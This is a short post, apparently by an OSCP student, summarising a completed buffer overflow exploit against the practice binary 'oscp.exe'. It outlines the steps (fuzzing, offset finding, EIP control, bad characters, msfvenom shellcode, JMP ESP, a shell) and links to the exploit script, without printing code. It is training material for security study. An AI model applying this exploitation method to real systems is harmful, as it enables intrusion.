First buffer overflow exploit done. “oscp.exe” has 10 overflows you can practice on, this is for “OVERFLOW1”. Using tools like Immunity Debugger and Mona we followed a proven set of steps to create exploit in Python3:
✔️ Fuzz the app to determine around when it would crash by flooding buffer
✔️ Used pattern matching to determine the exact offset
✔️ Verified we controlled the EIP by using a specific string of characters
✔️ Figured out what the bad characters were and added them as such to msfvenom when generating shellcode
✔️ Figured out the JMP_ESP
✔️ Finished up the exploit and for bonus points coded it to pop a shell in the same window using subprocess and Popen.
https://github.com/rflemen/python_code/blob/main/buffer_overflows/oscp.exe/OVERFLOW1/exploit.py
